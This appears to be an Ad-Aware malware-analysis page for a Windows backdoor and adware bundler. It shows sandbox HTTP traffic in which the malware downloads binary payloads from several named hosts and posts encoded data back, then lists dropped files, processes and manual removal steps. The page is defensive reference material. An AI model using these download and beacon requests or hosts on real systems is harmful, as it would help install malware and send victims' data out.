B.L./.h.7.M.t.u.y.M.Y.J.5.o.6.R.s.1.p.G.F.L.X.7.i.c.R.I.K. .y.c.J.F.b.
Y.I.L.l.G.E.R.B.h.V.I.C.N.H.F.Y.C.5.6.i.I.J.v.G. .g.q.l.q.V.H.A.4. .2.
i.F.R.V.k.H.d.U. .o.w.8.6./.z.w.l.0.Y.U.O.T.b.J.E.y.w.r.y./.j.f.F.V.h.
W.C.p.p.f.3.x.c.Y.z.i.Q.B.y.6.z.f.s.1.b.6.O.D.M.X.M.c.a.Y.k.K.7.P.r.0.
m.F.n.T.R.r.H.J.J.Q.T.s.s.K.j.g.2.A.i.u.Q.t.P.d.P.h.B.A.P.j.S.a.G.D.s.
f.0.w.O.F.a.e.r.c.B.z.8.Z.t.n.o.T.t.Z.E.s.n.Q.h.u.d.R.E.x.4.l.c.I.7.m.
C.y.G.Z.F.G.e.W.d.p.p.v.A.V.T.s.S.q.E.j.Q.y.5.X.2.k.7.T.p.v.n.n.e.Q.o.
q.o.1.R.j.3.c.B.w.v.O.I.o.G.a.u.I.k.Q.G.M.Q. .I.m.Q.U.p.D.u.A.V.F.C.2.
S.Y.4.9.T.Z.3.m.L.e.5.r.p.Y.8.t.H.7.w.P.d.O.s.t.v.W.h.S.6.V.D.a.e.L.8.
3.D.R.s.C.3.l.7.J.Y.B.8.e.u.w.T.O.6.0.k.O.P.K.o.S.M.p.l.Q.2.C.3.U.0.U.
B.V.1.Q.5.G.y.W.z.x.8.V.B.a.i.F.m./.e.m.B.p.U.H.v.A.r.C.Q./.h.d.4.A.v.
K.3.F.x.A.V.R.V.a.b.S.T.A.S.G.F.3.d.H. .I.J.g.r.W.T.q.a.O.q.R.C.E.U.7.
b.9.a.S.L.g.R.R.4.m.s.s.E.8.M.8.B.n.M.Z.6. .t.b./.X.Q.R.d.b.c.A.w.a.k.
B.l.2.x.5.m.U.x.l.f.m.T.u.C.N.j.s.N.9.j.X.C.K.8.A.E.y.D.W.q.1.F.r.x.X.
G.3.q.K.H.6.C. .a.Z.w.T.m.Q.P.s.a.J.V.0.c.f.9.a.X.D.9.t.o.X.l.o.B.I.K.
3.r.a.d.D.R.c.w.p.6.c.W.p.X.6.P.7.d.S.V.3.i.w.p.a.g.T.u.w.m.z.e.0.
<<< skipped >>>


GET /hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Host: linq-goody-best.xyz


HTTP/1.1 200 OK
Server: openresty
Date: Sat, 09 May 2015 23:05:58 GMT
Content-Type: application/octet-stream
Content-Length: 547095
Connection: close
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Content-Description: File Transfer
Access-Control-Expose-Headers: Content-Length
Content-Disposition: attachment; filename*=utf-8''download.exe; filename="download.exe"
..r8...bF.Yx.......j.A.{.].k.......h.....E.......D..-JD..^RH..........
e......U......%..>......Y.L{.Dk..x....4..<..|.nj..#....R.-y/.dZ.
...G ....!...t...c......?...S......._3...[.....-gx......;.."gx.7.WI>
;\ z|..j.d.....c..}.D...5....t.......6..*..y.f..........Q.....K(......
..n.jI...Mth#...{.|?..w.=..X.......2D.5y.B..................lc.F......
..=....da.......H.-...L>.[.2....SY...1.c..7....I.^.,N=..M.y......:k
FY...i....5. .y...^7..A-..7Y4.M"......D.?...r......>...X..=.clI....
.......s.c.q3.)4.1;s .On..f=...F'%.h....{..0..X...*'..N./..T...\a..Z..
1U-..6P...U.n...V<X...G........~.....MrN.....k.....L....r../>3.Q
czvr........z>[email protected]...<P.^r...3.`o.p...l.@.{9i{..c..^..G.*..
.......AZ.2....`...\n......Xe.c. 222.y.DG......,.0.9.....Wi..w....#n_.
./R..3.%~.< .v.Iw/. .Qt....>....`.!..d..*.... .D.7g.P..8..._..{.
x^.f..o.*.}m,..........3 ..T.Vu..W...rS.2.i{[email protected]...>V2.w....v.F
..e.9..E.....P....n(.P.eL.F&.r#.0....R.=...5..0.1.9V.yj..%..........(.
.&C.2XN;..h.......x.%#.1T1.(3...R.......wD.~....I.(.lB.B.......&......
#9........]...^..S...k&6.d'..04.....MNf.55..;.IF. ...w....N.S.<?...
..<....z.>r.dD.{b6......*}4.[...R...X.....%^{%r...`r6..)Q...^...
.2 ...OC#9...NqK..S.]X'.../.(g.UF..5..:njCP..~.X...G....#....a.....k..
J.Z.......\:|..X..s%.L...Y...^[email protected]..'kW.A.s..;......k..x......i.
..z..............2z...?.B...=n......OC3..R.... 0 .. A..f.t.....R3... |
...Iin....7'.m'v...nD..9.,[email protected]..:a.....l_...g8.&....:..5......
v...Cq..^..j....4....P.K.[.....R...$if...M.,.g.F..._p.........x.".
<<< skipped >>>


POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 4532
Cache-Control: no-cache

data=39ZH7x2d1y6Icv1defocsdCTnOTqMgTdh3aIlyGSKJupDB4MrUsKm9xC 4w3Nc7bRRe9qw3P1xG0ANsWnJCVI2r Z5mH5aBn8FttrxxFGN1 IHbZ/HJZ/5lWvWtjmwqqkP6Bb NPW5ZpO GGZw6CBzegOG5 Ds4X6XSMPUjpfUQ8YKnWxecsSPOyABHcJMPJ8UslQJf4MqVqJQkYapEqeOyASZaWejNcwWt75MWIp3BQRO2SbwG/j8 MlZeCZAhU2ekXxV7bOA5gzat/ jtIz1NuNs2bZG/mD8umcTxGiF4Xjh96NkJwl7kb0ImZ1eST4oLRQkxS3Eg/SBzcgKQg2ik4ySJRJMBgpJeaznLYPhQBbsPZeWqUbtYpAAwr1wEG/32Xx8UqAzs51Cy6yeuQDKysZoxcU7Jjj1sF7Lx7CVwEoXkb6uvjUHdUKkYOdpCuqwkQdTIukh6/hmlCmvPaGjROOoUG4wSwdN wFzRYPZK27pnbCVvOr92Pho2lNpU1 cgCJACBH9QUtU2cyUel M6fT6v76dUCO9zcKd7lcDJ31PfjCOIsWx3pluarLfgtu9FxzdLFqgoLK1bS0iHQdVfE1t7SPDmyeqeH9QTWlzrI7Ba6SDeFAYy4gy8Vd7PouBbsmamo02OosmPriOCbX5FTf lzbLeZjMQizliuysVKLYLJ5yuNqI6jR9BfZ2IA6oLmgqRfigYGqGYXGWnsZV8hROtIuqVAFTRiCLnkYGm3hRCBUME7zDfF66SKSOMbVfy48JXUsyClUGlWjdiP5VE8x4A/TBo3awyQvB kXhArJRqG Y0tSmjhskMi002QiFM4R21vdR24GYhttiSnDNb8s6iFePiR0NiuWFkDo67otxZf8hRX6oflpniVzlR B8dyKCZO18N3GfCMWoUu12PDBxPE5mgsu&report=QH8R3fNPd1n9AgdnikFSDxwHv6AB55R ilZSoU8gPOuyCI8PPAlwYAw5idmolx/avfKXiqKIqpjTRZ 0nXC3M4A9DMXyluhnxUMbsE AjOPZF/M3Ac2yxUOibgYmjc3K/E67aHyjeutBzsVNLOSDWrU1YO6ljydc7GUJDj8A3zl0a /OaNgyncMe3FDp/fZ088wqQnolFlFKaKX2PQQgJhwSZtZ ZVCr5b5TKMrRzK3LmddoQKljfzDwFUUL95Ic Yzb1wTyHtXSe8eZx2Dd2j3GOFbup28vZ/3VAMv8uFyRaHU3/3TEw0J8HqQX0xvUX0beVUlSiu6QwP2wuGZlTfqvFjsyI0lx/GYbrztT3arOvC5
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:03 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: goldavid.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:04 GMT
Content-Type: application/octet-stream
Content-Length: 2012618
Connection: close
Content-Disposition: attachment; filename="9Bgp6JPux0JTfR.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.....$V........'.................,[email protected]~.l....$Dh.O ...d....
.< .....8\.....4X|....0Tx....,Pt....(L@....;.b...1..i.}..t)......N.
....zV3....0F-....,t. ...lI~y....(Lp.......n.....Y.Nm.3O.t.9M).o.W.x..
s..6...iS8..#..I..*.........c.-....xC...."...Cm.3.3v.:M)...W....s..4..
.iS^}.#..I.X.......xS.c.-.....Co.......Om.3.....M).`.....8\.....4X|...
.0Tx....,.u...Ee.p....$Hlp... Ec.....@......<......8\.....4Xl....0V
x....,Pt....)Lp....4El....zSe.....@d.....<`.....8\.....4X|0L...Tx.T
..,.t...d#L.....$Hl.... Dh.....@......<`.....8\.....4X|....0Tx....,
Pt...%.L0....$Hl.... $m.....@d.....<`.....8\.....4X|...tDTx....,Pd.
..L-Lp....$Hl.... Dh....|n......<P....t=\.....x]|....0Tx....,.t...`
I8......Ll.$.. .l.....@d.....<`.....8.....s4X|@...04s....,Pz....(Lp
....$Hl.....6...... ......<`.....3\.....4X|....pTx....,Pt....(Lp...
.$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$H
l.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl..
.. Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... 
Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp...U......?...`
;...xd...4E.0l:...a.C.C..IH|..cI8...)..(P!.PkA$.x....,...?4.eLi.;%?...
....N..........f..E.....cM4o:....-kv....h.r.x.. H9.XS.(.=.9.qTD9J.....
1.W...9...E..f.,.O ....c.&.,..t7....t..W...`...<`.j.p.:[email protected].
3...9|. ..0X%%.Q|-Rh..,Y..|p...(.5.q..$.....?u...3..........qh.$......
.....-p_......cK....|..D..\..30Q.=`..$..`x...}.......].1......\./....P
|.O.Z.!t.(6.(P.X7..q.@...@ ....3...l....B......X.e.A...8...C....=.
<<< skipped >>>


GET /?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: loveshero.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:18 GMT
Content-Type: application/octet-stream
Content-Length: 1139531
Connection: close
Content-Disposition: attachment; filename="2UzDN7fW9Yl4sH.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.Gc...!.......nT.....-...-.........tD.c......[.........7Q.OIj}d....
......= [.arv.........Lr>M_Fdf........S., 'AWq9..........0>a.Sfj
...........#[email protected]}..........." uHmy..
........*4 R.Xi..........o.2ZEsx..........%8=IEu..........K.k~..*8....
.....DQ.gz.-8.........<]..A']nt.........W.<M].Yo.........Vn}...#
0........7Q................rj..!c......M.r......yj[..............zk\M&
gt;/ ..........{l]N?0!...........m^ON....A......A\:792.Sfj...........q
 V.gs........_..6&.(...............2....U\....Q.,..B...\.l...(a....R..
.f&|#.q8|.,[email protected]..$Y.... YC..Ah.......w8.J;`.
...(......xiZK.-............j[L=..p........Izk\M>? ..........{l]N?5
!..........|i^O@1"..........mn_PA"#..........~o0QC3....l.......p!SCT&.
..........qbSD5&...........rcTE6'...........sdUF7(.......X]..4eVG8)...
....q...tfWH9*...........vgXI: ...........wn.J;,....E......xiZK<-..
...........:8\..RG........zk\.>/ ..........{,]N..Esw........|}_O@#"
..........}n_PA2#T..'......~o.RB3$U..........paRC4%.............? V&..
.........rcTC7'...........s$UFu(...........teVG8)...........ufWH9*....
.......vgXI: ...........whYJ;,...........xiZK<-...........yj[L=....
........zk\M>/ ..........{l]N?0!..........|m^O@1"..........}n_PA2#.
.........~o`QB3$...........paRC4%...........qbSD5&...........rcTE6'...
........sdUF7(...........teVG8)...........ufWH9*...........vgXI: .....
......whYJ;,...........xiZK<-..Uz.P(....xzh..k.#.....?...?...0o ..7
...#...{...o.d.S.......<9.c....g.E.\.E.Vd.n_P..~.......f[..OaAC
<<< skipped >>>


GET /?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:52 GMT
Content-Type: text/html
Content-Length: 8562
Connection: close
Content-Disposition: attachment; filename="6.txt"
..T.m.U.x.B.Q.b.d.M.U.9.9.U.d.a.W.Y.S.0.N.h.g.U.y.G.X.P.a.Y.B.C.K.k.B.
/.U.z.e.X.S. .A.h.h.2.4.j.4.D.L.6.T.8.y.X.F.o.r.A.K.G.r.m.p.T.c.U.E.I.
5.1.N.A.b.U.1.Z.7.q.4.2.a.n.I.v.l.9.C.4.a.O.m.D.F.2.y.O.G.y.A.H.P.C.g.
U.S.i.f.R.V.j.y.v.A.z.o.e.1.r.v.k.N.a.9.c.3.W.B.C.P.h.E.J.l.U.b.n.a.d.
H.h.z.9.t.P.H.h.f.g.G.f.5.G.H./.n.q.V.S.Q.p.N.k.p.B.z.r.W.J.e.K. .t.R.
Q.a.e.T.6.q.r.E.W.S.p.O.X.X.Q.f.i.6.K.G.w.X.F.S.w.R.O.9.S.l.g.F.z.w.e.
/.G.s.o.b.v.l.P.b.O.u.j.N.a.V.A.a.s.H.V.F.b.n.2.i.x.9.n.q.S.c.v.X.h.Z.
a.s.P.Y.K.f.e.z.q.d.w.T.r.F.u.n.z.1.x.8.P.D.3.L.I.y.s.0.u.k.r.t.c.H.v.
9.S.b.V.z.g.6.M.K.P.O.K.c./.j.1.2.0.Q.c.Z.O.Z.w.Y.a.H.d.r.E.v.j.K.4.Q.
E.Z.L.s.M.v.n.9.6.7.a.c.q.2.6./.S.f.R.v.q.5.T.5.D.u.P.R.d.x.V.w.1.9.x.
w.c.C.z.4.W.B.a. .m.L.P.p.z.Y.i.L.q.g.e.D.b.q.r.v.t.w.3.s.9.F.T.i./.h.
S. .V.2.U.2. ./.r.U.3.7.3.n.X.q.x.B.5.c.U.F.I.G.n.k.t.L.m.S.O.s.n.t./.
P.B.8.e.K.b.c.2.y.9.H.c./.7.2.s. .c.2.f.T.L.t.N.v.c.J.7.M.a.y.g. .p.z.
h.M.R.Z.n.o.v.o.W.C.v.h.d.B.J.B./.T.s.K.f.K.q./.5.8.u.V.x.1.X.O.m.I.r.
T.h.b.U.C.1. .G.E.Y.H.6.7.6.p.M.S.G.t.C.5.y.u.W.X.w.Z.f.T.n. .A.6.r.H.
w.v.o.O.m.D.K.j.7.u.3.a.1.k.2.U.t.y.r.b.G.f.u.a.r.g.i.1.e.2.r.r.r.E.n.
V.r.c.W.8.c.W.p.f.o.q.l.p.G.d.k.E.M.Y.x.a.A.y.c.V.4.N.K.w.8.Q.M.v.f.X.
C.8.j./.H./.N.Q.Z.i.u.0.t.a.W.m.c.j.g.w.j.m.q.5.8.i.k.z.l.4.1.K.s.0.f.
k.b.N.5.v.b.i.z.G.t.I.L.j.I.Y.1.H.Y.y.8.7.A.J.h.U.q.J.N.T.B.C.q.d.o.b.
5.l.K.u.N.y. .9.D.W.J.d.E.0.n.T.f.c.f.h.9.N.w.k.y.q.C.3.H.b.A.W.E.r.q.
u.9.f.i.o.d.9.i.G.5.E.4.Z.M.k.t.z.c.A.r.O.Y.1.N.A.Z.n.h.p.J.W.i.d.6.f.
F.y.X.8.x.P.f.O.6.B.p.g.d.7.A.f.1.r.C.z.m.v.u.U.m.g.j.P.M.3.n.J.O.
<<< skipped >>>


GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 1962996
Connection: close
Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z......A3.....U........;...;.......Y..........[..\..>o.%:..(.....
.S[..... ...qD.D...}M.;t..n(.....P\..=..,E..=l.3G..1f..... u..L...u...
..SI..<a..w..73.=... d..T...q..4...E...n..I..k*..^..9|..J..]:..'...
R...d.K`...T..V..9b..j...k..2..)P..!c..A..#M.T....s..Q..-\..l..bU..&s.
.D.."m.E...?y..J..$}..4.. k...S..\.."m.*U.. d..]...h..#...O...x.Ua..3d
..T...%..2..?{..)..%d..j6.BJ..11..Q..<q......~.."..YE..}".%F..#|..\
..5}..\..BS..,...C..;;..P..?z.VU..cY..m...k..,..-X..=t.3G..1f.....1~..
Y..?j..{...N..)l..Z..>a..D..4 ..c...v..!..5*...o."d..r...C..4|..L..
B*..u..X....a..O..)F..U...`......w..#...M..jB..g..9F..\..*|..2...h..9.
..E...r.?_...O..u..4i..h...q..%..J...:o..K...5......S..{..&!..t..]....
D.E...i<.M....m..c...v..!...R...i..}..m*..D..w?..L...}.."...N..gu..
F..1d.W...kx..A...u../...I...H.&}..=`./T...5..O..8V..t.......%.2L..>
;y.-s..`D..`..:n..9..=z...o.(\...`. t..hh..^..4O..y..1...}l.EP..gz..c.
.l~..{../,..9...g...3..]..u:.3g../~..V..U ..e..,G...J.E~...\.:@...Z...
..S~.....0J...a.!b...Y..w..ie..{..:~.....[H..14.8j..u:.:e...@..]..&!..
7...X...%.6k..$f.:G..o~..z...p..q..QD..<1.D_...0..... f..y..7u..x..
.s...q.=j...r..X..>c..[..2J..s..\[email protected].]....V..S..8R.....,c.
..e.2k..`x.JW..  ..l..%I..:..M...'k.AZ..4_.LA..RK..\..2}..2..bI..<a
..M..9l.Z...a#.....Y/..s..^...;e..A...a.E...m'.....R*..q..Q...Be..M..9
g.'Y..z!......}..)..U...Bi..\..<[email protected]#..J...k..2...T..j2.A...e%.A
...b .....jC......I..Bu..I.."k..V..e2..`..6V..(...u...O......J.3I..s".
.H..#N.....0N..&w..k...d..R..)w..o..3O.....^...%/..c..aA..}..0A..|
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

rundll32.exe_1432:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1932
    regsvr32.exe:1980
    ArmorerRise.xyz.exe:2036
    %original file name%.exe:1176
    %original file name%.exe:1988
    %original file name%.exe:368
    %original file name%.exe:1888
    %original file name%.exe:188
    %original file name%.exe:1016
    rundll32.exe:1432
    rundll32.exe:1196

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
    %Program Files%\TailCutter\TailCutter.dll (80814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
    %Program Files%\Chime\Chime.exe (1504 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
    %Program Files%\Chime\Chime.dat (5 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

